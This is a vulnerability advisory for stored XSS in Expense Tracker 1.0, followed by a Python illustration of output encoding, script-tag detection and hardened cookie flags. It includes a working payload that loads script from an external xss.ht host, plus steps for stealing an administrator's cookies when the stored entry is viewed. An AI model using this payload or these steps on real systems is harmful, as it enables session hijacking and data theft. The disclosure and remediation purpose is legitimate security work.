# Exploit Title: Expense Tracker 1.0 - Stored Cross-Site Scripting
# Exploit Author: Shivam Verma (cyb3r_n3rd)
# Date: 2022-11-05
# Vendor Homepage: https://code-projects.org/expense-tracker-in-php-with-source-code/
# Software Link: https://code-projects.org
# Version: 1.0
# Category: Web Application
# Tested on: Parrot OS
# Contact: https://www.linkedin.com/in/shivam413
Stored Cross-Site Scripting (XSS): Stored XSS occurs when a malicious script is injected into a vulnerable web application and persisted on the server (for example in a database field or log entry). The script is then served to every user who views the stored data, rather than only to the victim of a single crafted request.
The attacker retrieves the captured admin cookie from their listener each time someone triggers the stored script.

Attack Vector: This vulnerability lets an attacker inject a malicious payload into the Expense Category section. The payload is stored in the chosen field and executes each time an admin or user visits the page and manages the category data. When the XSS triggers, the attacker can capture the admin's cookies and access the users' data in plain text.

Step 1. Install the software.
Step 2. Click on "Add Expense Category".
Step 3. Paste the XSS payload into the "Expense Name" parameter.
Step 4. Click on "Add".
Step 5. Wait for the administrator to open the page that renders the stored category.
Step 6. The admin cookie is received every time the administrator processes the request.
---
XSS Payload: "><script src=https://nick413.xss.ht></script>
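The root cause the advisory describes is that the "Expense Name" value is written back into HTML without output encoding. The following Python example is added here to illustrate the defect class and its fix; it is not code from the Expense Tracker project (which is PHP) and does not reproduce its templates. The function names, the input-field markup, and the cookie name are assumptions chosen for illustration; the sample input is the payload string listed above.

```python
import html
import re

# Sample input: the payload string from the advisory, reused here as the
# value an attacker would submit in the "Expense Name" field.
SAMPLE_INPUT = '"><script src=https://nick413.xss.ht></script>'


def render_category_unsafe(name: str) -> str:
    """Hypothetical rendering that mirrors the defect class in the advisory:
    the stored value is concatenated straight into an HTML attribute, so the
    leading quote and '>' close the attribute and tag, and the <script>
    element that follows becomes live markup."""
    return f'<input type="text" name="expense_name" value="{name}">'


def render_category_safe(name: str) -> str:
    """Hardened rendering: contextual output encoding for an HTML attribute.
    html.escape(..., quote=True) turns &, <, >, " and ' into entities, so the
    stored value can never break out of the attribute it is placed in."""
    return f'<input type="text" name="expense_name" value="{html.escape(name, quote=True)}">'


# Detection helper: a raw <script element in rendered output means encoding
# was skipped somewhere; entity-encoded text (&lt;script) does not match.
SCRIPT_TAG = re.compile(r"<script\b", re.IGNORECASE)


def contains_live_script_tag(rendered_html: str) -> bool:
    """True when an unencoded <script tag survived into the output."""
    return SCRIPT_TAG.search(rendered_html) is not None


def session_cookie_header(session_id: str) -> str:
    """Defence in depth for the cookie-theft step in the advisory: HttpOnly
    denies document.cookie access to any script that still runs, Secure keeps
    the cookie off plain HTTP, SameSite limits cross-site sending.
    The cookie name is an assumption (PHP's default session cookie)."""
    return f"Set-Cookie: PHPSESSID={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


if __name__ == "__main__":
    unsafe = render_category_unsafe(SAMPLE_INPUT)
    safe = render_category_safe(SAMPLE_INPUT)
    print("unsafe output contains live <script>:", contains_live_script_tag(unsafe))
    print("safe output contains live <script>:  ", contains_live_script_tag(safe))
    print(safe)
    print(session_cookie_header("example-session-id"))
```

Output encoding must match the context the value lands in (attribute, element body, JavaScript string, URL); the attribute encoding shown here is not a substitute for a JavaScript-context encoder, and the HttpOnly flag limits cookie theft but does not stop a script from acting on the admin's behalf while the page is open.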